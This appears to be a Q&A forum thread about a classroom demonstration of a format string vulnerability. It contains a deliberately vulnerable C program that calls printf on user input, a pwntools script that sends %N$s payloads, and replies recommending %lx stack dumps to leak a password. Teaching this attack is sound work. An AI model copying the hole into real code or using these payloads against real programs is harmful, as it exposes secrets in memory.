Format string vulnerability not showing values on the stack
PROBLEM
I am trying to put together a short demonstration of a simple hack for a presentation about cyber-security. I thought about using a format string vulnerability, and heavily inspired by this video i put together this demo:
// main.c
#include <stdio.h>
#include "secret.h"

void testPassword() {
  char password[64];
  char input[128];

  readPass(password); // puts the secret into password

  printf("Password: ");
  scanf("%127s", input);

  printf("\nYou typed:\n");
  printf(input); // vuln

  if (strcmp(password, input) == 0) {
    printf("\n...Senha correta!\n");
  } else {
    printf("\n...Voce errou :(\n");
  }
}

int main() {
  testPassword();
}

// secret.h
#include <string.h>

#define pass "bcc_unesp_2024"

void readPass(char buff[64]) {
  strcpy_s(buff, 64*sizeof(char), pass);
}

Separating it into two files for presentations sake. I intend to show how the basics of the exploit work and ultimately use this python script to find the password and other interesting values:
import pwn

pwn.context.log_level = "critical"

programa = pwn.ELF("./a.out")

for i in range(0, 256):

    payload = b"".join([
        b"%" + str(i).encode("utf-8") + b"$s"
    ])

    pty = pwn.process.PTY
    p = programa.process(stdin=pty, stdout=pty)

    p.recvuntil(b"senha: ")
    p.sendline(payload)
    response = p.recvall().decode("latin-1")
    print(response)



After running this many enviorement variables, nonsense strings, and seg faults are displayed as expected, but the password is nowhere to be found.
I am using wsl2 for writing this code, and I got the same results when thesting on a Ubuntu 20.04.6 LTS virtual box, and compiling with GCC 11.4.0 without any flags, just gcc main.c
I appreciate any help or suggestions regarding this demonstration
If any informations is missing, dont hesitate to ask, thank you in advance :)
I have tried:

putting all the code in one file
declaring and defining password in the scope of the function directly
searching for pointers with %p and hex values with %x in the python script
going through the code with gdb and looking at values after $sp (the stack pointer), where I was able to find the desired password, but I couldnt replicate this with the python script

the original code if you need it: https://github.com/argArthur/Demonstracao-cyber.git

So if I understand your Python correctly, you end up passing a format string like %17$s which takes the 17th argument to printf (i.e. some random value up on the stack), treats it as a pointer to a string, and prints that string.  Why should any of those values actually point to the password, other than by chance?  Sure, you might get lucky, but if you don't, well, too bad.

It seems to me that something like %17$x would be more effective, because then you get the actual value from the stack, rather than what it points to, and we do know that the password is somewhere up above on the stack.  Of course you will have to convert it from hex back to ASCII if you want to be able to read it.

Or simpler yet, skip the $ business and just pass something like "%lx%lx%lx%lx%lx%lx%lx%lx..." and get a big chunk of the stack 8 bytes at a time.  You have to byte-swap and convert back to ASCII, but for me I get the password as the 6th and 7th integers.

By the way, you should tell us what compiler / version / optimization options you are using.

@NateEldredge It was my understaing that since I declared the password as a char array in the scope of the function it would be stored on the stack above the format string, if this is wrong I don't know exactly what route to go.
I tried inputting %x%x%x... and now %lx%lx%lx%lx... and decoding the hex into ascii, but I get nothing  but random characters after the sequence of %lxs, I'm not sure what you mean by byte-swap before converting.
